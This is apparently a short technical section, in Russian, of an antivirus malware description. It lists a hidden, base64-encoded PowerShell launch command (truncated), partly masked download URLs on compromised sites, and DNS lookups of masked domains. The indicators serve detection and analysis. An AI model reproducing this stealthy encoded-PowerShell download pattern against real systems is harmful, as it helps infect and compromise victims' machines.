Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w hidden -enco JABOAHcAegB1AHoAYgBuAGoAPQAnAEQAegBzAHgAZwB6AGIAbQBsAGQAdAAnADsAJABPAHIAdQBrAG8AYgBwAGMAcgBhAHkAIAA9ACAAJwA4ADcAMgAnADsAJABBAHYAdQBwAHQAdwBlAHQAagB4AD0AJwBYAHk...
- 'st###.aca-apac.com':443
- http://ds####neroots.com/wp-content/cb72253/
- http://ww###lper.com/comm/moneymakers/css/m53/
- DNS ASK ds####neroots.com
- DNS ASK ok###atest.com
- DNS ASK ww###lper.com
- DNS ASK st###.aca-apac.com